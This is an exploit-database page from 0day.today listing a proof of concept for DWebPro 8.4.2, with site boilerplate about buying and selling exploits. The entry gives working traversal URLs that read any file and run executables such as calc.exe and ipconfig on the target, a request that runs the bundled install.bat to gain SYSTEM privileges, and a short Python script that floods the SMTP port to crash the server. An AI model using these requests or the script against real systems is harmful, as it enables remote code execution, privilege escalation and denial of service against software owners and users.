0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
DWebPro 8.4.2 - Multiple Vulnerabilities
# Exploit Title: DWebPro 8.4.2 Remote Binary Execution # Date: 01/10/2016 # Exploit Author: Tulpa # Contact: tulpa@tulpa-security.com # Author website: www.tulpa-security.com # Author twitter: @tulpa_security # Vendor Homepage: http://www.dwebpro.com/ # Software Link: http://www.dwebpro.com/download # Version: 8.4.2 # Tested on: Windows 7 x86 # Shout-out to carbonated and ozzie_offsec 1. Description: DWebPro is a software package used for used for distributing dynamical web sites on CD/DVD or USB drives. It includes it's own web server called "primary web server" as well as an SMTP server. The POC below relates to the installation of DWebPro itself however it is conceivable that the vulnerability could be leveraged within certain contexts from a CD/DVD or USB drive. Dependent on the client configuration this vulnerability could be exploited remotely and/or locally. The SMTP server of DWebPro is also extremely susceptible to DOS attacks. 2. Remote Binary Execution and Local File Inclusion Proof of Concept When browsing to the demo site installed with DWebPro you will find hyperlinks to various resources located on the local machine. One such example is "http://127.0.0.1:8080/dwebpro/start?file=C:\DWebPro\deploy\..\help\english \dwebpro.chm". Any file can be accessed on the vulnerable machine by simply replacing the start?file= location. It is important to note however that when browsing to an executable file through this vulnerability, that the web server will indeed run the application locally instead of prompting you for a download. As an example, the following will start the calculator process on the victim machine "http://192.168.0.1:8080/dwebpro/start?file=C:\Windows\system32\calc.exe". Calc.exe will by default execute with the same permission as the user who ran dwepro.exe initially. Basic cmd commands can also be executed such as with "http://192.168.0.1:8080/dwebpro/start?file=ipconfig". These privileges can be escalated to SYSTEM however by installing the application as a windows service which will automatically run on start up. In order to initiate that installation, the attacker could take advantage of a script which is installed by default and can be executed thanks to the LFI vulnerability. This can be accomplished by using "http://192.168.0.1:8080/dwebpro/start?file=C:\DWebPro\service\install.bat". 3. Denial of Service Proof of Concept #!/usr/bin/python import socket import sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.0.1',25)) evil = 'A' * 300 s.recv(1024) s.send(evil) s.close() # 0day.today [2024-12-24] #